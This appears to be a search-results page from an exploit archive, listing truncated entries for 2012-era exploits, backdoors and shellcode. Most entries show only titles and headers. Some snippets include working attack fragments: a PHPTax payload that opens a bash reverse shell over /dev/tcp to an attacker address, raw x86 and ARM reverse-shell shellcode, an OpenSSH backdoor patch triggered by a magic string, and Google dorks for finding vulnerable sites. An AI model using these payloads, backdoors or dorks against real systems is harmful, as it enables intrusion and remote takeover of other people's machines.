1826 matches found
OpenSSH 6.0p1 Backdoor Patch 1.2 Vulnerability 0day
This patch is for openssh-6.0p1 source which combines a known openssh backdoor and Sebastian Krahmer's openssh.reverse capabilities. Telnet to target openssh server and issue udcgamaimagic string for getting reverse openssh connection. $id: udc-hackssh-v3bajaulaut-v1, 2012/10/28 05:00:50 slash...
ClanSphere 2011.3 - 'cs_lang' Cookie Local File Inclusion
Exploit Title: ClanSphere 2011.3 cslang cookie parameter Local File Include Vulnerability Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere Date: 10/22/2012 Author: Marco Tulio blkhtc0rp Vendor Homepage: http://www.csphere.eu Version: 2011.3 Tested...
PHPTax 0.8 Remote Code Execution
!/usr/bin/env python PHPtax 0.8 " print "Where payload is http://whatever.com/phptax - path to PHPtax with NO trailing /" sys.exit1 banner target = sys.argv1 reverseip = sys.argv2 reverseport = sys.argv3 payload = '%2Fbin%2Fbash%20%3E%26%20%2Fdev%2Ftcp%2F'+reverseip+'%2F'+reverseport+'%200%3E%261...
Sitecom MD-25x Multiple Vulnerabilities Reverse Root Shell Exploit
Exploit for windows platform in category remote exploits !/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link:...
Sitecom MD-25x Reverse Root Shell
!/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version:...
Sitecom MD-25x - Multiple Vulnerabilities
Sitecom MD-25x - Multiple Vulnerabilities !/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link:...
Sitecom MD-25x - Multiple Vulnerabilities
!/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version:...
linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337) execve("/bin/sh", [0], [0 vars]) - 72 bytes
/ Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 : 8054: e28f1001 add r1, pc, 1 8058: e12fff11 bx r1 805c: 2002 movs r0, 2 805e: 2101 movs r1, 1 8060: 1a92 subs r2,...
Raspberry Pi Linux/ARM - reverse_shelltcp,10.1.1.2,0x1337
Raspberry Pi Linux/ARM - reverseshelltcp,10.1.1.2,0x1337. Shellcode exploit for arm platform / Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 : 8054: e28f1001 add r1...
Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit
Exploit for linux platform in category remote exploits !/usr/bin/python ''' The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the /tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply recreate the file and obtain a root shell using a...
ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution
/ Exploit Title: Ipswitch WhatsUp Gold 15.02 Stored XSS - Blind SQLi - RCE Date: Jul 22 2012 Author: muts Version: Ipswitch WhatsUp Gold 15.02 Vendor URL: http://www.ipswitch.com/ An attacker can modify their snmpd.conf file with malicious JavaScript as follows: sysName alert124pt In addition,...
TCP/IP Invisible Userland Unix Backdoor with Reverse Shell
Exploit for unix platform in category local exploits ============================================ TCP/IP Invisible Userland Unix Backdoor with Reverse Shell ============================================ / \ / \ |\ /| | \ / \ | | / / | | | | | /| | | | / / | | / | | | | | / / | / / | | | | \ \ / /...
PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
?php www.bugreport.ir Title: PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version Vendor: http://www.php.net Vulnerable Version: PHP up to version 5.3.12 and 5.4.2 Exploitation: Remote Original Advisory: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ Original Exploit URL:...
Websense (Triton 7.6) Remote Command Execution
======= Summary ======= Name: Websense Triton 7.6 Unauthenticated remote command execution as SYSTEM Release Date: 30 April 2012 Reference: NGS00140 Discoverer: Ben Williams Vendor: Websense Vendor Reference: Systems Affected: Risk: Critical Status: Published ======== TimeLine ======== Discovered...
NGS00140 Technical Advisory: Websense Triton 7.6 - unauthenticated remote command execution as SYSTEM
======= Summary ======= Name: Websense Triton 7.6 Unauthenticated remote command execution as SYSTEM Release Date: 30 April 2012 Reference: NGS00140 Discoverer: Ben Williams [email protected] Vendor: Websense Vendor Reference: Systems Affected: Risk: Critical Status: Published ========...
FreePBX 2.10.0 / Elastic 2.2.0 Remote Code Execution
!/usr/bin/python Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit Google Dork: oy vey Date: March 23rd, 2010 Author: muts Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. Tested on: multiple CVE : notyet Blog post :...
linux/x86 reverse shell 91 bytes
Shellcode linux/x86 reverse shell ;Author : Gaussillusion ;Len : 91 byte ;\x31\xc0\x31\xdb\x31\xd2\x50\xb0\x66\x43\x52 ;\x6a\x01\x6a\x02\x80\xe1\xcd\x80\x66\xbe\x02 ;\x00\x89\xc7\xb0\x66\xb3\x03\x68\x7f\x00\x00 ;\x01\x66\x68\x27\x10\x66\x56\x89\xe2\x6a\x10...
TFTP-Server-1.4ST
Stack-Based buffer overflow in TFTP Server SP 1.4 for Windows allow remote attackers to cause a DoS or execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error in the handling of filenames and can be exploited to cause a stack-base...
Backdoor in Android for No-Permissions Reverse Shell
Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas...
Backdoor in Android for No-Permissions Reverse Shell
Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas...